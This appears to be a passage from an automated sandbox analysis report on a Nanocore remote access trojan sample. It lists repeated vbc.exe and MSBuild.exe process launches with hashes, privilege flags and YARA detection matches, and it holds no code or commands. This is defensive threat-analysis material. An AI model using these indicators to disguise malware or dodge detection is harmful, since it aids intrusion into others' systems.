                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x1340000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:28
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:29
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x70000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:14:55:33
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:35
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xa00000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:40
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:42
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xa00000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:47
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:48
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x360000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:14:55:53
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:55:55
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x10a0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:14:56:00
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:01
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x10a0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:07
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:08
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x11f0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:13
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:15
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x11f0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:20
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:22
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x13c0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:26
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:28
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x13c0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:33
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:35
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x13c0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:41
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:43
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xd0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:14:56:47
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            Disassembly

                            Code Analysis

                            Reset < >